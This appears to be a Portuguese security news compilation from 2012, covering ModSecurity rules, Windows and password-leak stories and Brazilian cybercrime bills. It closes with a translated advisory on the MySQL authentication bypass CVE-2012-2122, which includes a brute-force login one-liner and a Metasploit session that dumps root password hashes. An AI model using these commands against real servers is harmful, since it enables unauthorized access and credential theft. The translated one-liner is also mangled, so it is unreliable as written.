O OWASP ModSecurity Core Rule Set Project (CRS) é um conjunto de regras destinadas a detectar ataques comuns de aplicações web, o que transforma o ModSecurity em uma ferramenta de detecção de intrusão web. Ao contrário de sistemas de prevenção e detecção de intrusão, que dependem de assinaturas específicas para vulnerabilidades conhecidas, o Core Rule provê uma proteção genérica cotra vulnerabilidades desconhecidas, muitas vezes encontradas em aplicações Web, que tem uma codificação personalizada. O Core Rule são fornecidas pela gratuitamente pela TrustWave SpiderLabs e são comentadas fortemente para servir como um guia passo-a-passo para implantação do ModSecurity.

Conteúdo das Core Rules: A fim de fornecer proteção genérica para aplicações web , as principais regras usam as seguintes técnicas:

• Proteção  HTTP - detecção de violações do protocolo HTTP e uma política de uso definida localmente.
• Real-time Blacklist Lookups   - utiliza  3rd Party IP Reputation
• Web-based Malware Detection - identifica o conteúdo  malicioso na web por meio de verificação com o Google Safe Browsing API.
• HTTP Denial of Service Protections - defesa contra inundações HTTP e Slow HTTP DoS Attacks.
• Proteção contra ataques comuns da web - detectando os ataques comuns a aplicações web.
• Automação de Detecção - Detecção de bots, crawlers, scanners e atividades maliciosas.
• Integração com  AV Scanning  para uploads de arquivos - detecta arquivos maliciosos enviados através da aplicação web.
• Rastreamento de dados sensíveis - Rastreamento de números de cartão de crédito e vazamentos de blocos.
• Trojan Protection  - Detectando o acesso a cavalos de tróia .
• Identificação de Defeitos de aplicação - as indicações relativas a erros de configuração de aplicativos.
• Detecção de erro e Hiding - Disfarçando mensagens de erro enviadas pelo servidor.

Falha em componente da Microsoft permite execução de código remoto em todas as versões do Windows

A Microsoft trouxe a público ontem uma vulnerabilidade presente em um componente do sistema Windows (o Microsoft XML Core Services nas versões 3.0, 4.0, 5.0 e 6.0) que permite que um usuário malicioso execute código remoto em máquinas rodando Windows. A falha foi reportada em todas as versões do Windows suportadas pela empresa (XP, Vista, 7, Server 2003 e Server 2008), além do Office 2003 e 2007. Ainda não há uma correção para falha; a empresa sugere ações para minimizar o problema emMicrosoft Security Advisory (2719615): Vulnerability in Microsoft XML Core Services Could Allow Remote Code Executio.

Por outro lado, na Patch Tuesday de ontem foram lançadas correções para 28 falhas de segurança reportadas por 7 boletins, sendo 3 considerados “críticos” e os outros “importantes”. Dentre os bugs corrigidos estão falhas no Windows Remote Desktop Protocol (RDP), no Internet Explorer (versões 6 a 9) e no Framework .NET. Veja mais detalhes em Microsoft fixes 28 security bugs.

Fonte: http://www.seginfo.com.br/falha-em-componente-da-microsoft-permite-execucao-de-codigo-remoto-em-todas-as-versoes-do-windows/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Linked.in, Last.fm e eHarmony afetados por vazamento de senhas

Na última semana, três sites tiveram as senhas de seus usuários expostas por um usuário malicioso, aparentemente de origem russa. Só a rede social Linked.in teve 6,5 milhões de contas comprometidas (mais informações); o Last.fm (uma rede social de música) e o eHarmony (site de encontros) tiveram também alguns milhões de senhas divulgadas.

As senhas foram divulgadas através do hash, mas isso apenas diminui e não anula o problema, uma vez que segundo o blog do Linked.in eles não usavam salting, uma técnica que ajuda a evitar a decriptação de hashes MD5/SHA1 através de Rainbow Tables. De qualquer maneira, o mais importante é – independentemente se você possuir contas nesses sites ou não – tomar medidas de segurança como não usar a mesma senha em todos os serviços. Naturalmente – se você tiver conta neles, mude a sua senha imediatamente.

fonte: http://www.seginfo.com.br/three-hit-combo-linked-in-last-fm-e-eharmony-afetados-por-vazamento-de-senhas/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+seginfo+%28Blog+SegInfo+-+Seguran%C3%A7a+da+Informa%C3%A7%C3%A3o+-+Tecnologia+-+Not%C3%ADcias%2C+Artigos+e+Novidades%29

Projeto de lei tipifica cibercrimes

No dia 15 de maio, foi aprovado o Projeto de Lei 2793/11, que inclui crimes cibernéticos no Código Penal. Dois Projetos de Lei tramitam na casa. O primeiro, PL 84/99, conhecido popularmente como Lei Azeredo, tramita desde 1999 e sempre foi criticado por ter uma redação ampla que poderia criminalizar condutas diárias na internet como, por exemplo, repassar um e-mail com vírus sem intenção de danificar outros computadores.

O Projeto 2793/11, aprovado no dia 15 pela Câmara dos Deputados, foi escrito como uma alternativa para o texto do PL 84/99. “A nosso ver, o PL 84/1999, em sua redação atual, traz propostas de criminalização demasiadamente abertas e desproporcionais, capazes de ensejar a tipificação criminal de condutas corriqueiras praticadas por grande parte da população na Internet”, diz o texto.

Relatado pelo deputado Eduardo Azeredo (PSDB-MG), o Projeto de Lei 84/99 criminaliza o acesso não autorizado a um sistema. Ou seja, torna crime “acessar, mediante violação de segurança, rede de computadores, dispositivo de comunicação ou sistema informatizado, protegidos por expressa restrição de acesso”. A pena proposta é de reclusão de um a três anos e multa.

O PL 2793 não torna crime a ação de invadir computadores alheios, apenas nos casos que resultarem em roubo e repasse ou comercialização de informações. Segundo os autores do texto, a intenção é punir “apenas quando a conduta do agente estiver relacionada a determinado resultado danoso […] excluindo-se assim, mais uma vez, os casos de mero acesso a informações”. Quanto à pena, equipara-se à de violação de segredo profissional: três meses a um ano de detenção e multa.

Segundo Leonardo Palhares, especialista em Direito Digital e diretor da Câmara e-net, o PL 2793/11 é mau feito e não abarca questões imprescindíveis. Palhares defende que o Projeto de Lei Azeredo é muito mais específico e eficaz e acredita que o texto foi aprovado às pressas “devido ao clamor de uma situação pontual que despertou a atenção de todos” – referindo-se ao caso do vazamento das fotos da atriz Carolina Dieckmann. E critica, “São penas muito reduzidas se pensar no tamanho do problema que pode ser gerado por essas ações”.

O PL 2793/11 também trata órgãos públicos com diferença: há aumento de pena caso o crime seja cometido contra o presidente da República, governadores, prefeitos e outros dirigentes do Estado.

Apesar da efetividade do Projeto de Lei 2793/11 ser questionável, podemos dizer que ter onde enquadrar um cibercriminoso já seria um começo.

Segundo o portal de Tecnologia da Folha, a especialista em direito digital Patricia Peck diz que o PL preenche uma lacuna na lei brasileira. “Ela é essencial, porque no direito penal não se pode fazer analogias. Até agora não tínhamos nenhum crime virtual definido.”

Ainda no portal da Folha, Peck diz que, se aprovada, a lei complementa o Marco Civil da Internet (PL 2.126/2011), atual bandeira de ativistas da liberdade na web. O Marco Civil, proposta do Ministério da Justiça que trata dos principais direitos e dos deveres de usuários na internet, foi aberto para consulta pública e recebeu, em 2010, mais de duas mil contribuições populares para o texto final. O texto do Marco ainda será avaliado pelos deputados.

Por que é tão difícil aprovar uma lei para o cibercrime?

“O desafio de combater o crime praticado na Internet se impõe a todos os países do mundo.”PL 84/99

O crime praticado na internet tem características particulares, diferentes das características do mundo físico, que dificultam muito seu julgamento. Uma dessas características é a extraterritorialidade; na internet não existem barreiras geográficas, não há o espaço de um país e o espaço de outro. “Se alguém invadiu o seu e-mail, você tem que buscar os logs que comprovem essa invasão. E onde estão esses logs? Se eles estiverem em um servidor na Indonésia, será necessário pedir ao governo de lá que obrigue o data center a fornecer essa informação. O processo é muito mais difícil”, exemplifica o especialista Rogerio Reis.

Outro aspecto característico do problema é a dificuldade de produção de evidências digitais que permitam às autoridades provar a autoria dos crimes. “O cara que conhece bem a tecnologia não vai ser identificado, é super difícil rastrear”, avalia o especialista em Segurança da Informação, Ivo Machado.

Além disso, é preciso tomar todos os cuidados para não suprimir os direitos dos cidadãos, garantindo, por exemplo, o acesso de todos à internet. “Não se deve admitir que legislações penais – infelizmente, um mal necessário em nossa sociedade – precedam o estabelecimento de direitos e garantias. A face repressiva do Estado não deve sobressair sobre seu papel como fiador máximo dos direitos do cidadão”, lembra o PL 2793/11.

O PL 84/99 pontua que, apesar das dificuldades na implementação de uma legislação para o cibercrime, a questão é de grande urgência. “Os dados privados dos cidadãos, como registros financeiros, de crédito, de saúde assim como os processos e autos judiciais estão progressivamente migrando para plataformas digitais em sistemas integrados na Internet. Acessos indevidos a tais sistemas têm o potencial de expor a vida privada de milhões de cidadãos”.

Para o Projeto virar Lei

É importante lembrar que o Projeto de Lei 2793/11 foi aprovado pela Câmara, mas ainda precisa ser aprovado pelo Senado sem alterações para seguir para sanção presidencial. Caso contrário, ele volta para apreciação dos deputados.

Fonte: http://www.ibliss.com.br/2433/brasil-finalmente-tera-lei-para-cibercrime/

Foi publicada nova cartilha de segurança pelo Cert.Br no dia 06/06/2012

O CERT.br – Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil – lançou na última segunda-feira uma nova versão da sua Cartilha de Segurança para Internet. Agora na versão 4.0, a cartilha traz conteúdos atualizados, com uma nova seção para redes sociais e celulares.

A Cartilha de Segurança para Internet é um livreto ilustrado que apresenta recomendações e dicas de como o usuário pode aumentar a sua segurança na Internet, mostrando os riscos que o usuário corre e os cuidados necessários. A cartilha é disponibilizada livremente (licença Creative Commons BY-NC-ND 3.0). Leia a cartilha no site cartilha.cert.br.

Acesse a cartilha:

CVE-2012-2122: uma falha de segurança Tragicamente Comedica em MySQL

Uma falha de segurança recentemente corrigida ( CVE-2012-2122 ) no MySQL e servidores de banco de dados MariaDB foi introduzida na suposição de que a função memcmp () sempre retornar um valor dentro na faixa de -127 a 127. Em algumas plataformas e com certas otimizações habilitadas, esta rotina pode retornar valores fora deste intervalo, fazendo com que o código que compara um hash de senhas erradas. Uma vez que o protocolo de autenticação gera um hash diferente cada vez que esta comparação é feita, há uma chance de 1 em 256, que QUALQUER senha seja aceita para autenticação.

Em suma, se você tentar autenticar em um servidor MySQL afectados por esta falha, há uma chance de ele aceitar a sua senha mesmo que esteja errada. Abaixo segue uma linha em bash que irá fornecer acesso a um servidor MySQL afetada como a conta de usuário root, sem realmente saber a senha.

$ for i in `seq 1 1000`; do mysql-u root -password=bad -h 127.0.0.1 2> / dev / null; done;

mysql>

Exploração

Apesar de uma vasta gama de versões do MySQL e MariaDB vulnerável, somente em alguns sistemas operacionais são exploráveis. Tudo se resume a saber se o memcmp () retorna um valor fora da faixa de caracteres não assinados. Segundo Sergei, este não é normalmente o caso, e a rotina é normalmente compilada no servidor como uma função inline. A principal exceção é quando o GCC utiliza a SSE otimização. Joshua Drake , um pesquisador de segurança com Accuvant Labs, forneceu um exemplo de aplicativo que pode determinar se o seu sistema pode ser afetado. Na maioria dos sistemas, os resultados desta aplicação coincidi com o pacote MySQL fornecido pela distribuição, mas a única maneira para ter a certeza é realmente testá-lo.

Até agora, os seguintes sistemas foram confirmados como vulneráveis:

• Ubuntu Linux 64 bits (10,04, 10,10, 11,04, 11,10, 12,04) (via muitos, incluindo @ michealc )
• OpenSuSE 12,1 64 bits MySQL 5.5.23-log (via @ michealc )
• Debian Unstable 64 bits 5.5.23-2 (via @ derickr )
• Fedora (via hexed   e confirmado pela Red Hat)
• Arch Linux (versão não especificada)

Comentários até agora indicam que as seguintes plataformas não estão vulneráveis:

• Builds Oficiais do MySQL e MariaDB (incluindo o Windows)
• Red Hat Enterprise Linux 4, 5 e 6 (confirmado pela Red Hat)
• CentOS usando oficial RHEL rpms
• Ubuntu Linux 32 bits (10,04, 11,10, 12,04, provavelmente todos)
• Debian Linux 6.0.3 64 bits (versão 14,14 Distrib 5.5.18)
• Debian Linux lenny 32 bits 5.0.51a-24 + lenny5 (via @ matthewbloch )
• Debian Linux lenny 64 bits 5.0.51a-24 + lenny5 (via @ matthewbloch )
• Debian Linux lenny 64 bits 5.1.51-1-log (via @ matthewbloch )
• Debian aperto Linux de 64 bits 5.1.49-3-log (via @ matthewbloch )
• Debian Linux aperto 32 bits 5.1.61-0 + squeeze1 (via @ matthewbloch )
• Debian aperto Linux de 64 bits 5.1.61-0 + squeeze1 (via @ matthewbloch )
• Gentoo 64 bits 5.1.62-r1 (via @ twit4c )
• SuSE 9.3 i586 MySQL 4.1.10a (via @ twit4c )
• OpenIndiana oi_151a4 5.1.37 (via @ TamberP )

A maioria dos fornecedores de Linux devem ter um patch em breve, se não já.

Advertências e Defesa

A primeira regra de segurança MySQL é não expor a rede em geral, em primeiro lugar. A maioria das distribuições Linux permite ao daemon do MySQL conexões para localhost, impedindo o acesso remoto para o serviço. Nos casos em que o acesso à rede devem ser fornecidos, o MySQL também oferece controles de acesso baseados em host. Há poucos casos de uso onde o daemon do MySQL deve ser intencionalmente expostos à rede mais ampla e sem qualquer controle de acesso baseado em host.

Se você é responsável por um servidor MySQL que está exposto à rede desnecessariamente, a melhor coisa a fazer é modificar o arquivo my.cnf, a fim de restringir o acesso ao sistema local. My.cnf pode ser aberto com o editor de sua escolha, procure a seção [mysqld] e mude (ou adicione uma nova linha para definir) o "bind-address" parâmetro para "127.0.0.1". Reinicie o serviço MySQL para aplicar essa configuração.

Se você estiver se aproximando esta questão a partir da perspectiva de um testador de penetração, este será um dos truques mais úteis do MySQL por algum tempo. Uma característica do Metasploit que você deve estar familiarizado é o módulo mysql_hashdump. Este módulo usa um nome conhecido e senha para acessar a tabela de usuário master de um servidor MySQL e armazená-lo em um arquivo. Isto pode ser facilmente quebrado usando uma ferramenta como o John the Ripper, fornecendo senhas em texto-claro que podem proporcionar um maior acesso.

Esta noite, Jonathan Cran (CTO de Pwnie Express e colaborador do Metasploit)  committed um módulo threaded brute-force que explora a falha de autenticação criando automaticamente um dump das senhas do banco de dados. Isso garante que mesmo se a vulnerabilidade for corrigida, você ainda deve ser capaz de acessar o banco de dados usando os hashes de senhas crackeadas. Uma rápida demonstração deste módulo é mostrado abaixo usando o GIT mais recente Metasploit Framework / snapshot SVN.

$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf  auxiliary(mysql_authbypass_hashdump) > run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Fonte:  https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql